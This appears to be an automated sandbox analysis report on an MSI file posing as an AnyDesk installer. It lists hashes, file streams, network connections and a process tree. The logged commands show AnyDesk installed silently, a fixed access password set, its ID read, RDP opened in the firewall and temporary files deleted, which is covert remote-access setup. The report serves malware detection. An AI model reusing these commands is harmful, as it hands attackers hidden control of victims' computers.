                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........h.}.;.}.;.}.;..";.}.;..#;.}.;...;.}.;...;.}.;Rich.}.;........................PE..L.....1b.........."......*....:..^...........@....@...................................:...@..........................................p..PH...........4:..<...........................................................................................text...5(.......*.................. ..`.itext...^...@...........................rdata..............................@..@.data.....9.......9..2..............@....rsrc...PH...p...J....9.............@..@.reloc...............0:.............@..B................................................................................................................................................................................................................................................................................................................
                                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Anydesk - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 0.7.0.0, Subject: Anydesk - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Anydesk, Keywords: Installer, Template: Intel;1033, Revision Number: {8CB27BF3-59BC-4419-BE15-E9E385453F27}, Create Time/Date: Thu Feb 18 21:32:30 2021, Last Saved Time/Date: Thu Feb 18 21:32:30 2021, Number of Pages: 200, Number of Words: 2, Name of Creating Application: MSI Wrapper (10.0.50.0), Security: 2
                                                                              Entropy (8bit):7.978539254164263
                                                                              TrID:
                                                                              • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                              File name:1.msi
                                                                              File size:4063232
                                                                              MD5:6cf5ad7a7d1b7bab0c62e246cf41a985
                                                                              SHA1:b06a03adc550ead96534f5e723395c4e16bfdf44
                                                                              SHA256:fb9f0bf2b71bf576053c56cb913ea4e93581fc9d3aa9d6d8a0ae572a1622f050
                                                                              SHA512:46cd8bd1ead75a8adb7d5bff81a2fdc04567d462e965664f6f9f796237839f07f74d2201c3da8f7f37c9dfc45749ed88708db5a216d84f7ac146e5af58a8608e
                                                                              SSDEEP:98304:pp+vXhd7YjjTcLO6KnQh5YUNa/ckQGQCWijuYAHw:+zkTciIYUNuNCAuPH
                                                                              TLSH:411633603AD8C537D2DA0636092E8BAA3A657D755F21C0DB2B587CBC5E317D3AC39342
                                                                              File Content Preview:........................>......................................................................................................................................................................................................................................
                                                                              Icon Hash:a2a0b496b2caca72
                                                                              Document Type:OLE
                                                                              Number of OLE Files:1
                                                                              Has Summary Info:
                                                                              Application Name:MSI Wrapper (10.0.50.0)
                                                                              Encrypted Document:False
                                                                              Contains Word Document Stream:False
                                                                              Contains Workbook/Book Stream:False
                                                                              Contains PowerPoint Document Stream:False
                                                                              Contains Visio Document Stream:False
                                                                              Contains ObjectPool Stream:False
                                                                              Flash Objects Count:0
                                                                              Contains VBA Macros:False
                                                                              Code Page:1252
                                                                              Title:Anydesk - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 0.7.0.0
                                                                              Subject:Anydesk - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com
                                                                              Author:Anydesk
                                                                              Keywords:Installer
                                                                              Template:Intel;1033
                                                                              Revision Number:{8CB27BF3-59BC-4419-BE15-E9E385453F27}
                                                                              Create Time:2021-02-18 21:32:30
                                                                              Last Saved Time:2021-02-18 21:32:30
                                                                              Number of Pages:200
                                                                              Number of Words:2
                                                                              Creating Application:MSI Wrapper (10.0.50.0)
                                                                              Security:2
                                                                              Document Code Page:1251
                                                                              Company:Anydesk
                                                                              General
                                                                              Stream Path:\x5DocumentSummaryInformation
                                                                              File Type:data
                                                                              Stream Size:120
                                                                              Entropy:2.826912441242884
                                                                              Base64 Encoded:False
                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . H . . . . . . . . . . . ( . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A n y d e s k .
                                                                              Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 48 00 00 00 03 00 00 00 01 00 00 00 28 00 00 00 00 00 00 80 30 00 00 00 0f 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 e3 04 00 00 13 00 00 00 19 04 00 00 1e 00 00 00 08 00 00 00 41 6e 79 64 65 73 6b 00
                                                                              General
                                                                              Stream Path:\x5SummaryInformation
                                                                              File Type:data
                                                                              Stream Size:528
                                                                              Entropy:4.752216684650982
                                                                              Base64 Encoded:True
                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . I n s t a l l e r . . . . . . . . . . . I n t e l ; 1 0 3 3 . . . . . . ' . . . { 8 C B 2 7 B F 3 - 5 9 B C - 4 4 1 9 - B E 1 5 - E 9 E 3 8 5 4 5 3 F 2 7 } . . @ . . . . k p = . . @ . .
                                                                              Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 e0 01 00 00 0d 00 00 00 01 00 00 00 78 00 00 00 02 00 00 00 18 01 00 00 03 00 00 00 70 01 00 00 04 00 00 00 08 01 00 00 05 00 00 00 80 00 00 00 07 00 00 00 94 00 00 00 09 00 00 00 a8 00 00 00 0c 00 00 00 d8 00 00 00 0d 00 00 00 e4 00 00 00
                                                                              General
                                                                              Stream Path:\x17163\x16689\x18229\x16766\x18365\x17760\x17636\x16947\x16167\x17896\x17656\x17753\x17074\x16693\x18480
                                                                              File Type:Microsoft Cabinet archive data, 3811024 bytes, 1 file
                                                                              Stream Size:3811024
                                                                              Entropy:7.999935868582085
                                                                              Base64 Encoded:True
                                                                              General
                                                                              Stream Path:\x17163\x16689\x18229\x16766\x18365\x17932\x17910\x17458\x16778\x17207\x17522\x17357\x18479
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Stream Size:212992
                                                                              Entropy:6.513444216841171
                                                                              Base64 Encoded:True
                                                                              General
                                                                              Stream Path:\x18496\x15167\x17394\x17464\x17841
                                                                              File Type:data
                                                                              Stream Size:672
                                                                              Entropy:4.764474142026
                                                                              Base64 Encoded:False
                                                                              General
                                                                              Stream Path:\x18496\x16191\x17783\x17516\x15210\x17892\x18468
                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                              Stream Size:8546
                                                                              Entropy:5.082724064913251
                                                                              Base64 Encoded:True
                                                                              General
                                                                              Stream Path:\x18496\x16191\x17783\x17516\x15978\x17586\x18479
                                                                              File Type:data
                                                                              Stream Size:1216
                                                                              Entropy:3.1068972075441508
                                                                              Base64 Encoded:False
                                                                              General
                                                                              Stream Path:\x18496\x16255\x16740\x16943\x18486
                                                                              File Type:data
                                                                              Stream Size:38
                                                                              Entropy:3.123963756721792
                                                                              Base64 Encoded:False
                                                                              General
                                                                              Stream Path:\x18496\x16383\x17380\x16876\x17892\x17580\x18481
                                                                              File Type:data
                                                                              Stream Size:2064
                                                                              Entropy:2.381269221109181
                                                                              Base64 Encoded:False
                                                                              General
                                                                              Stream Path:\x18496\x16661\x17528\x17126\x17548\x16881\x17900\x17580\x18481
                                                                              File Type:data
                                                                              Stream Size:4
                                                                              Entropy:1.5
                                                                              Base64 Encoded:False
                                                                              General
                                                                              Stream Path:\x18496\x16842\x17200\x15281\x16955\x17958\x16951\x16924\x17972\x17512\x16934
                                                                              File Type:data
                                                                              Stream Size:48
                                                                              Entropy:3.0684210940655055
                                                                              Base64 Encoded:False
                                                                              General
                                                                              Stream Path:\x18496\x16842\x17200\x16305\x16146\x17704\x16952\x16817\x18472
                                                                              File Type:data
                                                                              Stream Size:24
                                                                              Entropy:2.594360937770434
                                                                              Base64 Encoded:False
                                                                              General
                                                                              Stream Path:\x18496\x16842\x17913\x18126\x16808\x17912\x16168\x17704\x16952\x16817\x18472
                                                                              File Type:data
                                                                              Stream Size:42
                                                                              Entropy:2.9135675273020816
                                                                              Base64 Encoded:False
                                                                              General
                                                                              Stream Path:\x18496\x16911\x17892\x17784\x15144\x17458\x17587\x16945\x17905\x18486
                                                                              File Type:data
                                                                              Stream Size:4
                                                                              Entropy:1.5
                                                                              Base64 Encoded:False
                                                                              General
                                                                              Stream Path:\x18496\x16911\x17892\x17784\x18472
                                                                              File Type:386 compact demand paged pure executable
                                                                              Stream Size:16
                                                                              Entropy:1.9197367178034825
                                                                              Base64 Encoded:False
                                                                              General
                                                                              Stream Path:\x18496\x16918\x17191\x18468
                                                                              File Type:MIPSEB Ucode
                                                                              Stream Size:14
                                                                              Entropy:0.946372935985442
                                                                              Base64 Encoded:False
                                                                              General
                                                                              Stream Path:\x18496\x16923\x17194\x17910\x18229
                                                                              File Type:data
                                                                              Stream Size:60
                                                                              Entropy:3.5292412679834797
                                                                              Base64 Encoded:False
                                                                              General
                                                                              Stream Path:\x18496\x17163\x16689\x18229
                                                                              File Type:data
                                                                              Stream Size:8
                                                                              Entropy:1.75
                                                                              Base64 Encoded:False
                                                                              General
                                                                              Stream Path:\x18496\x17165\x16949\x17894\x17778\x18492
                                                                              File Type:data
                                                                              Stream Size:18
                                                                              Entropy:2.102187170949333
                                                                              Base64 Encoded:False
                                                                              General
                                                                              Stream Path:\x18496\x17490\x17910\x17380\x15279\x16955\x17958\x16951\x16924\x17972\x17512\x16934
                                                                              File Type:data
                                                                              Stream Size:216
                                                                              Entropy:4.294855551942891
                                                                              Base64 Encoded:False
                                                                              General
                                                                              Stream Path:\x18496\x17490\x17910\x17380\x16303\x16146\x17704\x16952\x16817\x18472
                                                                              File Type:data
                                                                              Stream Size:48
                                                                              Entropy:3.110087760732172
                                                                              Base64 Encoded:False
                                                                              General
                                                                              Stream Path:\x18496\x17548\x17648\x17522\x17512\x18487
                                                                              File Type:Dyalog APL aplcore version 171.0
                                                                              Stream Size:12
                                                                              Entropy:2.292481250360578
                                                                              Base64 Encoded:False
                                                                              General
                                                                              Stream Path:\x18496\x17630\x17770\x16868\x18472
                                                                              File Type:data
                                                                              Stream Size:32
                                                                              Entropy:2.198391110799899
                                                                              Base64 Encoded:False
                                                                              General
                                                                              Stream Path:\x18496\x17753\x17650\x17768\x18231
                                                                              File Type:data
                                                                              Stream Size:88
                                                                              Entropy:3.9470457308545095
                                                                              Base64 Encoded:False
                                                                              General
                                                                              Stream Path:\x18496\x17932\x17910\x17458\x16778\x17207\x17522
                                                                              File Type:data
                                                                              Stream Size:180
                                                                              Entropy:2.754589929626484
                                                                              Base64 Encoded:False
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Aug 5, 2022 18:23:17.955034971 CEST  49175        443        192.168.2.22     195.181.174.167
Aug 5, 2022 18:23:17.955077887 CEST  443          49175      195.181.174.167  192.168.2.22
Aug 5, 2022 18:23:17.955163002 CEST  49175        443        192.168.2.22     195.181.174.167
Aug 5, 2022 18:23:17.956656933 CEST  49175        443        192.168.2.22     195.181.174.167
Aug 5, 2022 18:23:17.956707001 CEST  443          49175      195.181.174.167  192.168.2.22
Aug 5, 2022 18:23:17.956804037 CEST  49175        443        192.168.2.22     195.181.174.167
Aug 5, 2022 18:23:18.078598976 CEST  49176        80         192.168.2.22     92.223.88.41
Aug 5, 2022 18:23:18.109005928 CEST  80           49176      92.223.88.41     192.168.2.22
Aug 5, 2022 18:23:18.109520912 CEST  49176        80         192.168.2.22     92.223.88.41
Aug 5, 2022 18:23:18.117553949 CEST  49177        6568       192.168.2.22     195.181.174.174
Aug 5, 2022 18:23:18.136924982 CEST  6568         49177      195.181.174.174  192.168.2.22
Aug 5, 2022 18:23:18.137054920 CEST  49177        6568       192.168.2.22     195.181.174.174
Aug 5, 2022 18:23:18.137501955 CEST  49177        6568       192.168.2.22     195.181.174.174
Aug 5, 2022 18:23:18.158116102 CEST  6568         49177      195.181.174.174  192.168.2.22
Aug 5, 2022 18:23:18.158333063 CEST  49177        6568       192.168.2.22     195.181.174.174
Aug 5, 2022 18:23:45.921768904 CEST  49178        20000      192.168.2.22     80.209.241.3
Aug 5, 2022 18:23:46.016635895 CEST  20000        49178      80.209.241.3     192.168.2.22
Aug 5, 2022 18:23:46.019696951 CEST  49178        20000      192.168.2.22     80.209.241.3
Aug 5, 2022 18:23:46.019758940 CEST  49178        20000      192.168.2.22     80.209.241.3
Aug 5, 2022 18:23:46.153834105 CEST  20000        49178      80.209.241.3     192.168.2.22
Aug 5, 2022 18:23:46.159286976 CEST  49178        20000      192.168.2.22     80.209.241.3
Aug 5, 2022 18:23:46.294455051 CEST  20000        49178      80.209.241.3     192.168.2.22
Aug 5, 2022 18:23:46.294933081 CEST  20000        49178      80.209.241.3     192.168.2.22
Aug 5, 2022 18:23:46.295002937 CEST  20000        49178      80.209.241.3     192.168.2.22
Aug 5, 2022 18:23:46.299264908 CEST  49178        20000      192.168.2.22     80.209.241.3
Aug 5, 2022 18:23:47.520963907 CEST  49178        20000      192.168.2.22     80.209.241.3
Aug 5, 2022 18:23:47.615866899 CEST  20000        49178      80.209.241.3     192.168.2.22
Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Aug 5, 2022 18:23:17.905138016 CEST  55868        53         192.168.2.22  8.8.8.8
Aug 5, 2022 18:23:17.924896002 CEST  53           55868      8.8.8.8       192.168.2.22
Aug 5, 2022 18:23:17.925493956 CEST  55868        53         192.168.2.22  8.8.8.8
Aug 5, 2022 18:23:17.944211960 CEST  53           55868      8.8.8.8       192.168.2.22
Aug 5, 2022 18:23:18.053093910 CEST  49688        53         192.168.2.22  8.8.8.8
Aug 5, 2022 18:23:18.075155973 CEST  53           49688      8.8.8.8       192.168.2.22
Aug 5, 2022 18:23:18.088778019 CEST  58836        53         192.168.2.22  8.8.8.8
Aug 5, 2022 18:23:18.109394073 CEST  53           58836      8.8.8.8       192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Aug 5, 2022 18:23:17.905138016 CEST | 192.168.2.22 | 8.8.8.8 | 0x8710 | Standard query (0) | boot.net.anydesk.com | A (IP address) | IN (0x0001)
Aug 5, 2022 18:23:17.925493956 CEST | 192.168.2.22 | 8.8.8.8 | 0x8710 | Standard query (0) | boot.net.anydesk.com | A (IP address) | IN (0x0001)
Aug 5, 2022 18:23:18.053093910 CEST | 192.168.2.22 | 8.8.8.8 | 0xcfca | Standard query (0) | boot.net.anydesk.com | A (IP address) | IN (0x0001)
Aug 5, 2022 18:23:18.088778019 CEST | 192.168.2.22 | 8.8.8.8 | 0x5d9d | Standard query (0) | boot.net.anydesk.com | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Aug 5, 2022 18:23:17.924896002 CEST | 8.8.8.8 | 192.168.2.22 | 0x8710 | No error (0) | boot.net.anydesk.com | | 92.223.88.41 | A (IP address) | IN (0x0001)
Aug 5, 2022 18:23:17.944211960 CEST | 8.8.8.8 | 192.168.2.22 | 0x8710 | No error (0) | boot.net.anydesk.com | | 195.181.174.167 | A (IP address) | IN (0x0001)
Aug 5, 2022 18:23:18.075155973 CEST | 8.8.8.8 | 192.168.2.22 | 0xcfca | No error (0) | boot.net.anydesk.com | | 92.223.88.41 | A (IP address) | IN (0x0001)
Aug 5, 2022 18:23:18.109394073 CEST | 8.8.8.8 | 192.168.2.22 | 0x5d9d | No error (0) | boot.net.anydesk.com | | 195.181.174.174 | A (IP address) | IN (0x0001)

                                                                              Target ID:1
                                                                              Start time:18:22:14
                                                                              Start date:05/08/2022
                                                                              Path:C:\Windows\System32\msiexec.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\1.msi"
                                                                              Imagebase:0xff1c0000
                                                                              File size:128512 bytes
                                                                              MD5 hash:AC2E7152124CEED36846BD1B6592A00F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate

                                                                              Target ID:2
                                                                              Start time:18:22:15
                                                                              Start date:05/08/2022
                                                                              Path:C:\Windows\System32\msiexec.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\msiexec.exe /V
                                                                              Imagebase:0xff1c0000
                                                                              File size:128512 bytes
                                                                              MD5 hash:AC2E7152124CEED36846BD1B6592A00F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate

                                                                              Target ID:3
                                                                              Start time:18:22:16
                                                                              Start date:05/08/2022
                                                                              Path:C:\Windows\System32\VSSVC.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\vssvc.exe
                                                                              Imagebase:0xff910000
                                                                              File size:1600512 bytes
                                                                              MD5 hash:B60BA0BC31B0CB414593E169F6F21CC2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate

                                                                              Target ID:4
                                                                              Start time:18:22:16
                                                                              Start date:05/08/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k swprv
                                                                              Imagebase:0xff7d0000
                                                                              File size:27136 bytes
                                                                              MD5 hash:C78655BC80301D76ED4FEF1C1EA40A7D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate

                                                                              Target ID:5
                                                                              Start time:18:22:57
                                                                              Start date:05/08/2022
                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 6381DE7DB6BAADD41D0E24C26E59EDFC
                                                                              Imagebase:0xd00000
                                                                              File size:73216 bytes
                                                                              MD5 hash:4315D6ECAE85024A0567DF2CB253B7B0
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate

                                                                              Target ID:6
                                                                              Start time:18:23:03
                                                                              Start date:05/08/2022
                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 22388C515E15FC158EA4B11229C0F8D9 E Global\MSI0000
                                                                              Imagebase:0xd00000
                                                                              File size:73216 bytes
                                                                              MD5 hash:4315D6ECAE85024A0567DF2CB253B7B0
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate

                                                                              Target ID:7
                                                                              Start time:18:23:04
                                                                              Start date:05/08/2022
                                                                              Path:C:\Windows\SysWOW64\icacls.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
                                                                              Imagebase:0x5b0000
                                                                              File size:27136 bytes
                                                                              MD5 hash:1542A92D5C6F7E1E80613F3466C9CE7F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate

                                                                              Target ID:9
                                                                              Start time:18:23:06
                                                                              Start date:05/08/2022
                                                                              Path:C:\Windows\SysWOW64\expand.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
                                                                              Imagebase:0xf70000
                                                                              File size:53248 bytes
                                                                              MD5 hash:659CED6D7BDA047BCC6048384231DB9F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate

                                                                              Target ID:11
                                                                              Start time:18:23:11
                                                                              Start date:05/08/2022
                                                                              Path:C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe"
                                                                              Imagebase:0x400000
                                                                              File size:3837440 bytes
                                                                              MD5 hash:8C42AB81F90EE0592F7A709F0F7E320B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low

                                                                              Target ID:12
                                                                              Start time:18:23:16
                                                                              Start date:05/08/2022
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:cmd /c c:\programdata\anydesk.exe --install C:\ProgramData\AnyDesk --silent
                                                                              Imagebase:0x4a350000
                                                                              File size:302592 bytes
                                                                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Target ID:13
                                                                              Start time:18:23:16
                                                                              Start date:05/08/2022
                                                                              Path:C:\Windows\System32\drivers\rdpdr.sys
                                                                              Wow64 process (32bit):
                                                                              Commandline:
                                                                              Imagebase:
                                                                              File size:165888 bytes
                                                                              MD5 hash:1B6163C503398B23FF8B939C67747683
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate

                                                                              Target ID:15
                                                                              Start time:18:23:17
                                                                              Start date:05/08/2022
                                                                              Path:C:\Windows\System32\drivers\tdtcp.sys
                                                                              Wow64 process (32bit):
                                                                              Commandline:
                                                                              Imagebase:
                                                                              File size:23552 bytes
                                                                              MD5 hash:51C5ECEB1CDEE2468A1748BE550CFBC8
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:16
                                                                              Start time:18:23:18
                                                                              Start date:05/08/2022
                                                                              Path:C:\ProgramData\anydesk.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:c:\programdata\anydesk.exe --install C:\ProgramData\AnyDesk --silent
                                                                              Imagebase:0x1040000
                                                                              File size:3829888 bytes
                                                                              MD5 hash:1BC5890C9E7BF54B7712E344B0AF9D04
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:17
                                                                              Start time:18:23:18
                                                                              Start date:05/08/2022
                                                                              Path:C:\Windows\System32\drivers\tssecsrv.sys
                                                                              Wow64 process (32bit):
                                                                              Commandline:
                                                                              Imagebase:
                                                                              File size:39936 bytes
                                                                              MD5 hash:19BEDA57F3E0A06B8D5EB6D619BD5624
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:18
                                                                              Start time:18:23:18
                                                                              Start date:05/08/2022
                                                                              Path:C:\Windows\System32\drivers\rdpwd.sys
                                                                              Wow64 process (32bit):
                                                                              Commandline:
                                                                              Imagebase:
                                                                              File size:212480 bytes
                                                                              MD5 hash:FE571E088C2D83619D2D48D4E961BF41
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:20
                                                                              Start time:18:23:25
                                                                              Start date:05/08/2022
                                                                              Path:C:\ProgramData\anydesk\AnyDesk.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\ProgramData\AnyDesk\AnyDesk.exe" --service
                                                                              Imagebase:0x12a0000
                                                                              File size:3829888 bytes
                                                                              MD5 hash:1BC5890C9E7BF54B7712E344B0AF9D04
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
• Detection: 0%, Virustotal
• Detection: 3%, Metadefender
                                                                              • Detection: 2%, ReversingLabs

                                                                              Target ID:21
                                                                              Start time:18:23:32
                                                                              Start date:05/08/2022
                                                                              Path:C:\ProgramData\anydesk\AnyDesk.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\ProgramData\AnyDesk\AnyDesk.exe" --control
                                                                              Imagebase:0x12a0000
                                                                              File size:3829888 bytes
                                                                              MD5 hash:1BC5890C9E7BF54B7712E344B0AF9D04
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:22
                                                                              Start time:18:23:41
                                                                              Start date:05/08/2022
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:cmd /c echo 31121985west|c:\programdata\anydesk\anydesk.exe --set-password
                                                                              Imagebase:0x4a0e0000
                                                                              File size:302592 bytes
                                                                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:24
                                                                              Start time:18:23:42
                                                                              Start date:05/08/2022
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo 31121985west"
                                                                              Imagebase:0x4a0e0000
                                                                              File size:302592 bytes
                                                                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:25
                                                                              Start time:18:23:42
                                                                              Start date:05/08/2022
                                                                              Path:C:\ProgramData\anydesk\AnyDesk.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:c:\programdata\anydesk\anydesk.exe --set-password
                                                                              Imagebase:0x12a0000
                                                                              File size:3829888 bytes
                                                                              MD5 hash:1BC5890C9E7BF54B7712E344B0AF9D04
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:26
Start time:18:23:54
Start date:05/08/2022
Path:C:\ProgramData\anydesk\AnyDesk.exe
Wow64 process (32bit):true
Commandline:"c:\programdata\anydesk\anydesk.exe" --get-id
Imagebase:0x12a0000
File size:3829888 bytes
MD5 hash:1BC5890C9E7BF54B7712E344B0AF9D04
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:27
Start time:18:23:58
Start date:05/08/2022
Path:C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):true
Commandline:netsh advfirewall firewall add rule name="RDP" dir=in protocol=TCP localport=3389 action=allow
Imagebase:0x13a0000
File size:96256 bytes
MD5 hash:784A50A6A09C25F011C3143DDD68E729
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:29
Start time:18:24:02
Start date:05/08/2022
Path:C:\Windows\SysWOW64\icacls.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\." /SETINTEGRITYLEVEL (CI)(OI)LOW
Imagebase:0xf00000
File size:27136 bytes
MD5 hash:1542A92D5C6F7E1E80613F3466C9CE7F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:31
Start time:18:24:06
Start date:05/08/2022
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files"
Imagebase:0x4aab0000
File size:302592 bytes
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

No disassembly